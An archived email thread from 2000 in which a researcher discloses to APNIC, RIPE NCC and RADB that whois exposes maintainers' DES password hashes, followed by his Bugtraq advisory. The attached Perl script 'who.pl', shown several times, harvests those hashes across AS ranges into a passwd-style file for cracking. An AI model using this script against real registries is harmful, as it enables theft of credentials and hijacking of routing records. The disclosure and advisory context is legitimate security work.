<14882.4469.52414.25633@localhost.localdomain> From: RIPE * RIPE> Database Administration X-Organization: * RIPE> RIPE Network Coordination Centre X-Phone: +31 20 535 4444 * RIPE> X-Fax: +31 20 535 4445 Date: Wed, 29 Nov 2000 11:31:25 +0100 * RIPE> Sender: ripe-dbm@ripe.net * * RIPE> -------------------------------------------- Managed by * RIPE> Request Tracker * * >>>>> "Gerald" == Gerald Andrew Winters writes: * * Gerald> Raju, * >> I've already sent a copy of this mail to RIPE and RADB. RADB's * >> reply basically states that ``it's what the users want, so our * >> hands are tied'', which isn't very heartening. I'm still * >> awating a response from RIPE. * * Gerald> Your characterization of my comments is true. However, I * Gerald> had much more to say. I will forward my original response * Gerald> after this email so that others can draw their own * Gerald> conclusions. * * >> While I agree that users (in general) should be given what they * >> want, I would still not (for example) allow a password-less * >> account as a Unix system administrator. * * Gerald> This is an unfair analogy. The relationship between a * Gerald> Unix sysadmin and his network is very much different * Gerald> between and entire community of users and the registries. * * Gerald> A sysadmin simply su's and makes whatever changes are * Gerald> desired. In contrast, changes to the technology used at * Gerald> the registries come about from the open standards process. * Gerald> This means changes take place at a slower pace through the * Gerald> meetings and with appoval from the entire community. The * Gerald> reason for this is to avoid dictatorship and general * Gerald> anarachy. The price for this is a slower migration path * Gerald> for changes. * * >> I have yet to evaluate the extent of damage that a person with * >> a cracked APNIC, RIPE or RADB password could do, but I suspect * >> that it could be pretty serious, at least in the short term. * * Gerald> Very true. * * >> Please allow me to reiterate that the policy of displaying * >> CRYPT-PW passwords without control is viewed by me personally * >> with great concern, and I suspect that that is the view most * >> security professionals also would take. My objective is to * >> have a secure, stable Internet, and I'm willing to do anything * >> in power to work towards this goal. If one of those tasks is * >> to bring potential security holes into the limelight, * * Gerald> Very true. However, your remark is akin to me making an * Gerald> Internet announcement something like, "SNMP v1 community * Gerald> strings are transmitted in cleartext. This is terrible! * Gerald> You have 1 week to fix it and then I'm going public." * Gerald> It's old news. We all know it and dislike it as much as * Gerald> you. * * Gerald> And what about "MAIL-FROM" authentication? You do not * Gerald> include this in your remarks. Certainly your observations * Gerald> would be more potent by adding "MAIL-FROM". * * Gerald> Have you read RFC 2726? Do you realize that all users can * Gerald> use this form of authentication? * * >> I shall do that (by posting to BUGTRAQ and CERT, albeit * >> reluctantly); before that, however, I would request you again * >> to fix the problem at the source rather than have half the * >> script-kiddies in the world trying to attack your databases, * >> and maybe succeeding. * * Gerald> The registries will not unilaterally go into the * Gerald> database's and change data or implement new sercurity * Gerald> features without the approval of the community. What you * Gerald> are suggesting won't work anyway (ie, you still have the * Gerald> "MAIL-FROM" problem). * * Gerald> We are all sympathatic to your criticism. In fact the * Gerald> RIPE NCC and myself have gotten up numerous times at * Gerald> public forums (ripe, ietf, ...) and urged the public to * Gerald> convert to PGP authentication. The registries agree with * Gerald> you but real change must come from the community. * * Gerald> I would suggest to you to come to the meetings and make * Gerald> your proposal. I'm sure you will have *many* supporters. * * Gerald> --Gerald Winters * * --[[application/octet-stream * Content-Disposition: attachment; filename="who.pl"][quoted-printable]] * #!/usr/bin/perl -w * # * # Brute force create a /etc/passwd-like file with DES-encrypted passwords= * * # from dumb whois lookups on RIPE and APNIC. Can be easily modified * # to handle RADB too. Once the file is created, run Crack (or your favou= * rite * # DES-crack program) on it and create some headache for the ``Internet * # community'' which has decided to reveal DES-encoded passwords as part * # of a whois lookup on a maintainer object. * # * # Copyright 2000, Raju Mathur , * # * # This program is available under the terms of the GNU General Public Lic= * ense * # * use strict ; * # * # Currently will work on RIPE and APNIC * # * my * $count =3D 0 ; * my * $outfile =3D shift ; * my * $registry =3D shift ; * if ( !defined $outfile || !defined $registry * || $registry !~ /apnic/i && $registry !~ /ripe/i ) * { * print STDERR "usage: $0 output-file APNIC|RIPE [start AS] [end AS]\n" ;= * * exit 1 ; * } * open OUT , ">$outfile" * or die "Cannot write to $outfile: $!\n" ; * my * $startas =3D shift ; * $startas =3D 1 * if !defined $startas ; * my * $endas =3D shift ; * $endas =3D 12000 * if !defined $endas ; * my * $server =3D "whois.apnic.net" ; * $server =3D "whois.ripe.net" * if $registry =3D~ /ripe/i ; * my * $maintainer ; * my * $descr ; * my * $notify ; * my * $auth ; * my * $passwd ; * foreach my $i ( $startas..$endas ) * { * print "*** AS$i\n" ; * open WHOIS , "whois AS$i\@$server|" * or die "Cannot whois AS$i: $!\n" ; * while ( ) * { * if ( /^mnt-by:\s*(.*)/ ) * { * $maintainer =3D $1 ; * last ; * } * } * close WHOIS ; * next * if !$maintainer ; * print "*** $maintainer\n" ; * open WHOIS , "whois $maintainer\@$server|" * or die "Cannot whois $maintainer: $!\n" ; * $descr =3D "" ; * while ( ) * { * if ( $_ =3D~ /^descr:\s*(.*)/ ) * { * $descr .=3D "$1, " ; * } * if ( $_ =3D~ /^mnt-nfy:\s*(.*)/ ) * { * $notify =3D $1 ; * } * if ( $_ =3D~ /^auth:\s*(.*)/ ) * { * $auth =3D $1 ; * } * last if $auth && $auth =3D~ /crypt-pw/i ; * } * next * if !$auth || $auth !~ /crypt-pw/i ; * print "*** <$descr> <$notify> <$auth>\n" ; * close WHOIS ; * $auth =3D~ /.*crypt-pw\s*(.*)/i ; * $passwd =3D $1 ; * $descr =3D~ s/[\n:]//g ; * $notify =3D~ s/://g ; * print OUT "$maintainer:$passwd:42:42:$descr:/dev/null:/bin/sh\n" ; * $auth =3D "" ; * $count++ ; * } * close OUT ; * print "$count records\n" ; * From technical@apnic.net Sat Dec 2 09:02:19 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["19664" "Saturday" "2" "December" "2000" "03:39:23" "+1000" "RIPE Database Administration via RT" "technical@apnic.net" nil "432" "[APNIC #62050] (technical) Crypted passwords for maintainer objects " "^From:" nil nil "12" nil nil (number " " mark " RIPE Database Adm Dec 2 432/19664 " thread-indent "\"[APNIC #62050] (technical) Crypted passwords for maintainer objects \"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id JAA03733 for ; Sat, 2 Dec 2000 09:02:15 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Sat, 02 Dec 2000 09:02:15 +0530 (IST) Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eB1HeA329340 for ; Fri, 1 Dec 2000 12:40:11 -0500 Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id DAA26193 for ; Sat, 2 Dec 2000 03:40:01 +1000 (EST) Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1) id xma026191; Sat, 2 Dec 00 03:39:33 +1000 Received: (from daemon@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id DAA04398; Sat, 2 Dec 2000 03:39:23 +1000 (EST) Message-Id: <200012011739.DAA04398@hadrian.staff.apnic.net> Reply-To: RIPE Database Administration via RT X-Request-ID: 62050 X-RT-Loop-Prevention: APNIC X-Sender: ripe-dbm@ripe.net X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt) Precedence: X-RT-MIME-Found: No From: RIPE Database Administration via RT To: raju@linux-delhi.org Cc: Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects Date: Sat, 2 Dec 2000 03:39:23 +1000 (EST) Status: RO Dear Raju Mathur, Raju Mathur writes: * [Munging two messages into one reply to keep everyone in sync] * * Hi Gerald, Mr/Ms Magee, * * Calculate cost of 1% of maintainer objects in the databases getting * perverted using a script like the attached one. Weigh against cost of * public outcry if you unilaterally decide to not reveal auth schemes in * whois lookups. Decide which is cheaper. * * I'm not going public with the script until either a deadline for * changing the whois behaviour determined by you passes, or you decide * not to make such a deadline. In January 1999, RIPE NCC deployed a PGP scheme for authenticating updates in the RIPE Database and the RIPE NCC encouraged the RIPE community to use it and continues to do so. The RIPE NCC can only change the functionality of the RIPE Database on the request of the RIPE Database Working Group, which has a well-defined procedure for discussing proposed changes. Its mailing list is and you are most welcome to express your concerns on that list and/or at a RIPE meeting. The next meeting is in January 2001, in Amsterdam, the Netherlands. If you have anymore questions, please contact . Regards, A. M. R. Magee ______________ RIPE NCC > * * Regards, * * -- Raju * * >>>>> "RIPE" == RIPE Database Administration via RT wr * ites: * * RIPE> Dear Raju Mathur, This matter was originally raised in * RIPE> October 1994, when the RIPE document ripe-120 * RIPE> (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published: * * RIPE> "It is by no means meant to keep out a determined malicious * RIPE> attacker. The crypt function is vulnerable to exhaustive * RIPE> search by (lots of) fast machines and programs to do the * RIPE> searching are widely available. For this reason it is * RIPE> strongly discouraged to use encrypted passwords also used * RIPE> for other purposes such as Unix login accounts in this * RIPE> scheme. As you are publishing the encrypted password in the * RIPE> database it is open to attack." * * RIPE> This was re-stated in ripe-153 (published in January 1997) * RIPE> and in ripe-157 (published in May 1997). In November 1998, * RIPE> ripe-189 was published, in which the RIPE NCC announced that * RIPE> it was supporting PGP authentication in the RIPE Database * RIPE> (the scheme is also described in RFC-2726). In January * RIPE> 1999, the RIPE NCC published ripe-190, offering free PGP * RIPE> licences on request, to anyone who had a mntner object in * RIPE> the RIPE Database. At every RIPE Meeting since that time, * RIPE> the RIPE NCC has encouraged the RIPE community to adopt PGP * RIPE> authentication. * * RIPE> The RIPE NCC does not manage the data in the RIPE Network * RIPE> Management Database. The responsibility for maintaining and * RIPE> protecting the data is with those who put the data in there. * RIPE> However, the RIPE NCC has provided a PGP authentication * RIPE> scheme and encourages its use. * * RIPE> You give a one-week deadline before you make a public * RIPE> statement about this. We cannot unilaterly change the * RIPE> functionality of the RIPE Database; we only act on the * RIPE> instructions of the RIPE Database Working Group, which has a * RIPE> mailing list: . We invite you to express * RIPE> your concerns on that list. * * RIPE> BTW, this is the first message from you that I have seen. I * RIPE> am investigating if we received any other message from you * RIPE> previous to this one. * * RIPE> If you have any more questions, please contact * RIPE> . * * RIPE> Kind regards, * * RIPE> A. M. R. Magee ______________ RIPE NCC * * * RIPE> Raju Mathur writes: * -----BEGIN PGP * RIPE> SIGNED MESSAGE----- * Hash: SHA1 * * Hi Bruce, * * I've * RIPE> already sent a copy of this mail to RIPE and RADB. RADB's * RIPE> reply * basically states that ``it's what the users want, so * RIPE> our hands are * tied'', which isn't very heartening. I'm * RIPE> still awating a response * from RIPE. * * While I agree * RIPE> that users (in general) should be given what they want, * I * RIPE> would still not (for example) allow a password-less account * RIPE> as a * Unix system administrator. I have yet to evaluate * RIPE> the extent of * damage that a person with a cracked APNIC, * RIPE> RIPE or RADB password could * do, but I suspect that it * RIPE> could be pretty serious, at least in the * short term. I * RIPE> presume that even if someone manages to change an * object * RIPE> in your database the owner/maintainer of that object would * * RIPE> still be notified and have the option of correcting the * RIPE> issue; however * even a short-term rogue change in the * RIPE> database can have global routing * and security implications * RIPE> (e.g. a change in the in.addr-arpa database * could be the * RIPE> precursor for major security breaches). * * Please allow me * RIPE> to reiterate that the policy of displaying CRYPT-PW * * RIPE> passwords without control is viewed by me personally with * RIPE> great * concern, and I suspect that that is the view most * RIPE> security * professionals also would take. My objective is * RIPE> to have a secure, * stable Internet, and I'm willing to do * RIPE> anything in power to work * towards this goal. If one of * RIPE> those tasks is to bring potential * security holes into the * RIPE> limelight, I shall do that (by posting to * BUGTRAQ and * RIPE> CERT, albeit reluctantly); before that, however, I would * * RIPE> request you again to fix the problem at the source rather * RIPE> than have * half the script-kiddies in the world trying to * RIPE> attack your databases, * and maybe succeeding. * * Regards, * RIPE> * * - -- Raju * * >>>>> "Bruce" == Bruce Campbell via RT * RIPE> writes: * * Bruce> * RIPE> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): * >> * RIPE> I see that doing a whois on a maintainer object in your * RIPE> whois * >> database reveals the DES-encrypted password of * RIPE> the maintainer. * >> As you are aware, it is trivial to * RIPE> brute-force crack (decode) a * >> DES password, and this is * RIPE> a serious security hole in your * >> service. Please treat * RIPE> this as a critical issue and refrain * >> from revealing the * RIPE> DES-encrypted password in whois lookups. * * Bruce> The * RIPE> APNIC Whois Databases uses code developed by our sister * * RIPE> Bruce> organisation for Europe (the RIPE NCC) and shares * RIPE> many of * Bruce> the same issues. The issue regarding the * RIPE> visibility of the * Bruce> 'auth' attribute in the * RIPE> maintainer object has been * Bruce> discussed before, * RIPE> however I regret that I am unable to find * Bruce> an online * RIPE> reference for this discussion. * * Bruce> I am cc'ing the * RIPE> appropriate address in the RIPE NCC in the * Bruce> hopes * RIPE> that they can provide a more definitive reference ( a * * RIPE> Bruce> reply to the APNIC ticketing system will also reply * RIPE> to the * Bruce> original requestor ). * * >> I shall be * RIPE> going public with this information in one week. * >> * RIPE> Request you to have fixed the problem by then. * * Bruce> * RIPE> Kind regards, * * Bruce> -- Bruce Campbell * RIPE> * Bruce> +61-7-3367-0490 Systems * RIPE> Administrator Regional Internet * Bruce> Registry Asia * RIPE> Pacific Network Information Centre For the * Bruce> Asia * RIPE> Pacific Region http://www.apnic.net/db/ * Bruce> * RIPE> whois.APNIC.net * * * * Bruce> * RIPE> -------------------------------------------- Managed by * * RIPE> Bruce> Request Tracker * -----BEGIN PGP SIGNATURE----- * * RIPE> Version: GnuPG v1.0.1 (GNU/Linux) * Comment: Processed by * RIPE> Mailcrypt 3.5.5 and Gnu Privacy Guard g.org/> * * * RIPE> iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb * RIPE> * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF * =mKDL * -----END PGP * RIPE> SIGNATURE----- * * * * RIPE> --- Headers Follow --- * * >> From info@apnic.net Wed Nov 29 20:33:24 2000 * RIPE> Received: (from info@localhost) by hadrian.staff.apnic.net * RIPE> (8.9.3/8.9.3) id UAA16430 for technical-ticket; Wed, 29 Nov * RIPE> 2000 20:33:24 +1000 (EST) Received: from guardian.apnic.net * RIPE> (int-gw.staff.apnic.net [192.168.1.254]) by * RIPE> hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id UAA16426 * RIPE> for ; Wed, 29 Nov 2000 20:33:24 * RIPE> +1000 (EST) Received: (from mail@localhost) by * RIPE> guardian.apnic.net (8.9.3/8.9.3) id UAA29609 for * RIPE> ; Wed, 29 Nov 2000 20:33:24 +1000 * RIPE> (EST) Received: from whois1.apnic.net(203.37.255.98) by * RIPE> int-gw.staff.apnic.net via smap (V2.1) id xma029607; Wed, 29 * RIPE> Nov 00 20:33:04 +1000 Received: from birch.ripe.net * RIPE> (birch.ripe.net [193.0.1.96]) by ns.apnic.net (8.9.3/8.9.3) * RIPE> with ESMTP id UAA122202 for ; Wed, 29 * RIPE> Nov 2000 20:33:04 +1000 (EST) Received: from ripe.net * RIPE> (office.ripe.net [193.0.1.97]) by birch.ripe.net * RIPE> (8.8.8/8.8.8) with ESMTP id LAA24135; Wed, 29 Nov 2000 * RIPE> 11:31:26 +0100 (CET) Message-Id: * RIPE> <200011291031.LAA24135@birch.ripe.net> To: * RIPE> raju@linux-delhi.org cc: Bruce Campbell via RT * RIPE> , gerald@merit.edu (Gerald Andrew * RIPE> Winters), db-admin@radb.net, irrd-team@merit.edu Subject: * RIPE> Re: [APNIC #62050] (technical) Crypted passwords for * RIPE> maintainer objects In-reply-to: Your message of Mon, 27 Nov * RIPE> 2000 13:17:01 +0530. * RIPE> <14882.4469.52414.25633@localhost.localdomain> References: * RIPE> <14882.4469.52414.25633@localhost.localdomain> From: RIPE * RIPE> Database Administration X-Organization: * RIPE> RIPE Network Coordination Centre X-Phone: +31 20 535 4444 * RIPE> X-Fax: +31 20 535 4445 Date: Wed, 29 Nov 2000 11:31:25 +0100 * RIPE> Sender: ripe-dbm@ripe.net * * RIPE> -------------------------------------------- Managed by * RIPE> Request Tracker * * >>>>> "Gerald" == Gerald Andrew Winters writes: * * Gerald> Raju, * >> I've already sent a copy of this mail to RIPE and RADB. RADB's * >> reply basically states that ``it's what the users want, so our * >> hands are tied'', which isn't very heartening. I'm still * >> awating a response from RIPE. * * Gerald> Your characterization of my comments is true. However, I * Gerald> had much more to say. I will forward my original response * Gerald> after this email so that others can draw their own * Gerald> conclusions. * * >> While I agree that users (in general) should be given what they * >> want, I would still not (for example) allow a password-less * >> account as a Unix system administrator. * * Gerald> This is an unfair analogy. The relationship between a * Gerald> Unix sysadmin and his network is very much different * Gerald> between and entire community of users and the registries. * * Gerald> A sysadmin simply su's and makes whatever changes are * Gerald> desired. In contrast, changes to the technology used at * Gerald> the registries come about from the open standards process. * Gerald> This means changes take place at a slower pace through the * Gerald> meetings and with appoval from the entire community. The * Gerald> reason for this is to avoid dictatorship and general * Gerald> anarachy. The price for this is a slower migration path * Gerald> for changes. * * >> I have yet to evaluate the extent of damage that a person with * >> a cracked APNIC, RIPE or RADB password could do, but I suspect * >> that it could be pretty serious, at least in the short term. * * Gerald> Very true. * * >> Please allow me to reiterate that the policy of displaying * >> CRYPT-PW passwords without control is viewed by me personally * >> with great concern, and I suspect that that is the view most * >> security professionals also would take. My objective is to * >> have a secure, stable Internet, and I'm willing to do anything * >> in power to work towards this goal. If one of those tasks is * >> to bring potential security holes into the limelight, * * Gerald> Very true. However, your remark is akin to me making an * Gerald> Internet announcement something like, "SNMP v1 community * Gerald> strings are transmitted in cleartext. This is terrible! * Gerald> You have 1 week to fix it and then I'm going public." * Gerald> It's old news. We all know it and dislike it as much as * Gerald> you. * * Gerald> And what about "MAIL-FROM" authentication? You do not * Gerald> include this in your remarks. Certainly your observations * Gerald> would be more potent by adding "MAIL-FROM". * * Gerald> Have you read RFC 2726? Do you realize that all users can * Gerald> use this form of authentication? * * >> I shall do that (by posting to BUGTRAQ and CERT, albeit * >> reluctantly); before that, however, I would request you again * >> to fix the problem at the source rather than have half the * >> script-kiddies in the world trying to attack your databases, * >> and maybe succeeding. * * Gerald> The registries will not unilaterally go into the * Gerald> database's and change data or implement new sercurity * Gerald> features without the approval of the community. What you * Gerald> are suggesting won't work anyway (ie, you still have the * Gerald> "MAIL-FROM" problem). * * Gerald> We are all sympathatic to your criticism. In fact the * Gerald> RIPE NCC and myself have gotten up numerous times at * Gerald> public forums (ripe, ietf, ...) and urged the public to * Gerald> convert to PGP authentication. The registries agree with * Gerald> you but real change must come from the community. * * Gerald> I would suggest to you to come to the meetings and make * Gerald> your proposal. I'm sure you will have *many* supporters. * * Gerald> --Gerald Winters * * --[[application/octet-stream * Content-Disposition: attachment; filename="who.pl"][quoted-printable]] * #!/usr/bin/perl -w * # * # Brute force create a /etc/passwd-like file with DES-encrypted passwords= * * # from dumb whois lookups on RIPE and APNIC. Can be easily modified * # to handle RADB too. Once the file is created, run Crack (or your favou= * rite * # DES-crack program) on it and create some headache for the ``Internet * # community'' which has decided to reveal DES-encoded passwords as part * # of a whois lookup on a maintainer object. * # * # Copyright 2000, Raju Mathur , * # * # This program is available under the terms of the GNU General Public Lic= * ense * # * use strict ; * # * # Currently will work on RIPE and APNIC * # * my * $count =3D 0 ; * my * $outfile =3D shift ; * my * $registry =3D shift ; * if ( !defined $outfile || !defined $registry * || $registry !~ /apnic/i && $registry !~ /ripe/i ) * { * print STDERR "usage: $0 output-file APNIC|RIPE [start AS] [end AS]\n" ;= * * exit 1 ; * } * open OUT , ">$outfile" * or die "Cannot write to $outfile: $!\n" ; * my * $startas =3D shift ; * $startas =3D 1 * if !defined $startas ; * my * $endas =3D shift ; * $endas =3D 12000 * if !defined $endas ; * my * $server =3D "whois.apnic.net" ; * $server =3D "whois.ripe.net" * if $registry =3D~ /ripe/i ; * my * $maintainer ; * my * $descr ; * my * $notify ; * my * $auth ; * my * $passwd ; * foreach my $i ( $startas..$endas ) * { * print "*** AS$i\n" ; * open WHOIS , "whois AS$i\@$server|" * or die "Cannot whois AS$i: $!\n" ; * while ( ) * { * if ( /^mnt-by:\s*(.*)/ ) * { * $maintainer =3D $1 ; * last ; * } * } * close WHOIS ; * next * if !$maintainer ; * print "*** $maintainer\n" ; * open WHOIS , "whois $maintainer\@$server|" * or die "Cannot whois $maintainer: $!\n" ; * $descr =3D "" ; * while ( ) * { * if ( $_ =3D~ /^descr:\s*(.*)/ ) * { * $descr .=3D "$1, " ; * } * if ( $_ =3D~ /^mnt-nfy:\s*(.*)/ ) * { * $notify =3D $1 ; * } * if ( $_ =3D~ /^auth:\s*(.*)/ ) * { * $auth =3D $1 ; * } * last if $auth && $auth =3D~ /crypt-pw/i ; * } * next * if !$auth || $auth !~ /crypt-pw/i ; * print "*** <$descr> <$notify> <$auth>\n" ; * close WHOIS ; * $auth =3D~ /.*crypt-pw\s*(.*)/i ; * $passwd =3D $1 ; * $descr =3D~ s/[\n:]//g ; * $notify =3D~ s/://g ; * print OUT "$maintainer:$passwd:42:42:$descr:/dev/null:/bin/sh\n" ; * $auth =3D "" ; * $count++ ; * } * close OUT ; * print "$count records\n" ; * --- Headers Follow --- >From info@apnic.net Sat Dec 2 03:39:21 2000 Received: (from info@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id DAA04393 for technical-ticket; Sat, 2 Dec 2000 03:39:21 +1000 (EST) Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254]) by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id DAA04389 for ; Sat, 2 Dec 2000 03:39:20 +1000 (EST) Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id DAA26188 for ; Sat, 2 Dec 2000 03:39:31 +1000 (EST) Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1) id xma026186; Sat, 2 Dec 00 03:39:10 +1000 Received: from birch.ripe.net (birch.ripe.net [193.0.1.96]) by ns.apnic.net (8.9.3/8.9.3) with ESMTP id DAA99438 for ; Sat, 2 Dec 2000 03:39:08 +1000 (EST) Received: from ripe.net (office.ripe.net [193.0.1.97]) by birch.ripe.net (8.8.8/8.8.8) with ESMTP id SAA10340; Fri, 1 Dec 2000 18:39:00 +0100 (CET) Message-Id: <200012011739.SAA10340@birch.ripe.net> To: raju@linux-delhi.org cc: technical@apnic.net (Bruce Campbell via RT), db-admin@radb.net, irrd-team@merit.edu, gerald@merit.edu (Gerald Andrew Winters) Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects In-reply-to: Your message of Thu, 30 Nov 2000 11:00:19 +0530. <14885.58859.501931.193491@localhost.localdomain> References: <14885.58859.501931.193491@localhost.localdomain> From: RIPE Database Administration X-Organization: RIPE Network Coordination Centre X-Phone: +31 20 535 4444 X-Fax: +31 20 535 4445 Date: Fri, 01 Dec 2000 18:39:00 +0100 Sender: ripe-dbm@ripe.net -------------------------------------------- Managed by Request Tracker From BUGTRAQ@SECURITYFOCUS.COM Thu Dec 7 07:40:54 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["8514" "Wednesday" "6" "December" "2000" "09:43:52" "+0530" "Raju Mathur" "raju@LINUX-DELHI.ORG" nil "184" "RIPE, APNIC, RADB update insecurities [re: [APNIC #62050]]" "^From:" nil nil "12" nil nil (number " " mark " Raju Mathur Dec 6 184/8514 " thread-indent "\"RIPE, APNIC, RADB update insecurities [re: [APNIC #62050]]\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id HAA02238 for ; Thu, 7 Dec 2000 07:40:53 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Thu, 07 Dec 2000 07:40:53 +0530 (IST) Received: from lists.securityfocus.com (lists.securityfocus.com [207.126.127.68]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eB6LlQ509854 for ; Wed, 6 Dec 2000 16:47:27 -0500 Received: from lists.securityfocus.com (lists.securityfocus.com [207.126.127.68]) by lists.securityfocus.com (Postfix) with ESMTP id E553F24D203; Wed, 6 Dec 2000 12:26:29 -0800 (PST) Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM (LISTSERV-TCP/IP release 1.8d) with spool id 19644600 for BUGTRAQ@LISTS.SECURITYFOCUS.COM; Wed, 6 Dec 2000 12:25:40 -0800 Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by lists.securityfocus.com (Postfix) with SMTP id 1AB0E24C680 for ; Tue, 5 Dec 2000 20:14:44 -0800 (PST) Received: (qmail 21794 invoked by alias); 6 Dec 2000 04:14:39 -0000 Delivered-To: bugtraq@securityfocus.com Received: (qmail 21791 invoked from network); 6 Dec 2000 04:14:38 -0000 Received: from delhi1.mtnl.net.in (203.94.243.51) by mail.securityfocus.com with SMTP; 6 Dec 2000 04:14:38 -0000 Received: from ganwaar.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/07Jul00-0916AM) id JAA0000019267; Wed, 6 Dec 2000 09:41:23 +0530 (IST) Received: (from raju@localhost) by ganwaar.com (8.9.3/8.9.3) id JAA07043; Wed, 6 Dec 2000 09:43:57 +0530 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Message-ID: <14893.48384.188897.231214@localhost.localdomain> Reply-To: raju@LINUX-DELHI.ORG X-cc: Bruce Campbell via RT , ripe-dbm@ripe.net, db-admin@radb.net, irrd-team@merit.edu, Gerald Andrew Winters From: Raju Mathur Sender: Bugtraq List To: BUGTRAQ@SECURITYFOCUS.COM Subject: RIPE, APNIC, RADB update insecurities [re: [APNIC #62050]] Date: Wed, 6 Dec 2000 09:43:52 +0530 Status: RO -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I found the following potential issues in the top-level routing registries: DISCLAIMER - ---------- Raju Mathur is not responsible for the misuse of any of the information and/or program(s) present in this message. The message and program(s) are provided as a service to the Internet community. Raju Mathur is not liable for any damages, direct or indirect, caused by the information or program(s) present in this advisory. BACKGROUND - ---------- The Routing Registries maintain databases of all routing information including Autonomous System Numbers and IN.ADDR-ARPA reverse lookups. The registries display DES-encrypted passwords to the general public, and the database update process is prone to being cracked. VENDOR CONTACT - -------------- Contacted RIPE, APNIC and RADB on 25 November, 2000. Responses indicate that the database format and information revealed were decided by the community and cannot be changed until the community as a whole votes to change them. I have a copy of the complete correspondence if anyone's interested. UPDATE PROCESS - -------------- If you are a maintainer for an AS or an IN-ADDR.ARPA domain, you can use any of the following methods to update information about your records (this is from my personal understanding, there could be minor differences between different registries): 1. NONE. You send updates by e-mail or through a web form to the registry, which are reviewed by the hostmaster and applied if they are syntatically and semantically OK. 2. MAIL-FROM. You send updates by e-mail or through the web form to the registry, which makes syntax and semantic checks and contacts you on your registered e-mail address. Once you reply in the affirmative, the updates are applied. 3. CRYPT-PW. The web forms allow you to apply semantically correct updates immediately if you choose CRYPT-PW as your authentication method. You only need your password to change the database. There is no human review of the update. 4. PGP. You send a PGP-signed message to the hostmaster, who verifies that the signature is correct, makes syntax and semantic checks and updates the database. ISSUES - ------ I'm not going to go into problems associated with MAIL-FROM and NONE authentication methods since (a) they have already been thrashed out in the context of the domain registries and (b) they require human intervention at some point. PGP also seems quite safe (as safe as using PGP is). The CRYPT-PW method of update is of interest here. Essentially anyone who manages to get hold of your plaintext CRYPT-PW (which uses DES as the encryption method) can masquerade as you and make changes to the databases without any other human intervention at all. This can lead to serious security and network outage issues in the short term. So far I thought that long-term implications were minimal since the original maintainer would be notified about rogue changes, but I'm not too sure about what happens if you change the maintainers contact address also. The problem is that the registries are constrained by their users to reveal the CRYPT'ed password to the general public through a simple whois mechanism. Doing a whois on the maintainer object in a registry reveals the CRYPT'ed password if s/he has one, after which there are any number of tools which would permit you to attempt to crack or brute-force the password. EXPLOIT - ------- Not really an exploit, but the attached Perl script (which has been tested on Linux with fwhois) will help you to extract DES-encrypted passwords from maintainer objects related to a range of Autonomous System Numbers (ASN's) and put them into a Unix-style password file which can be fed to Crack & co. for further ``processing''. Run it as: who.pl output-file APNIC|RIPE start-asn end-asn where output-file will be the file with the Unix-style passwd information including the encrypted password, APNIC or RIPE are which registry you wish to glean passwords from (it's trivial to modify the program to glean passwords from RADB) and start- and end-asn's define the block of AS numbers whose maintainer objects you are trying to to extract passwords from. SOLUTIONS - --------- Solutions exist at a number of levels: 1. Personal. Do not use CRYPT-PW as your authentication mechanism if you are a maintainer. All the registries recommend the use of PGP and will help you get started with PGP if you need that. 2. Community. Take a decision not to display the authentication mechanism to the general public, especially the encrypted passwords. It should be trivial to change the whois server code to conceal the passwords. 3. Registry. Encourage all your users to switch to a more secure method of sending updates. Define a date by which all users must switch. Remove the ``NONE'' authentication method altogether. For MAIL-FROM use unique, random identifiers for each request which must be present in the update confirmation message. Regards, - -- Raju - --[[application/octet-stream Content-Disposition: attachment; filename="who.pl"][base64]] IyEvdXNyL2Jpbi9wZXJsIC13CiMKIyBCcnV0ZSBmb3JjZSBjcmVhdGUgYSAvZXRjL3Bhc3N3 ZC1saWtlIGZpbGUgd2l0aCBERVMtZW5jcnlwdGVkIHBhc3N3b3JkcwojIGZyb20gZHVtYiB3 aG9pcyBsb29rdXBzIG9uIFJJUEUgYW5kIEFQTklDLiAgQ2FuIGJlIGVhc2lseSBtb2RpZmll ZAojIHRvIGhhbmRsZSBSQURCIHRvby4gIE9uY2UgdGhlIGZpbGUgaXMgY3JlYXRlZCwgcnVu 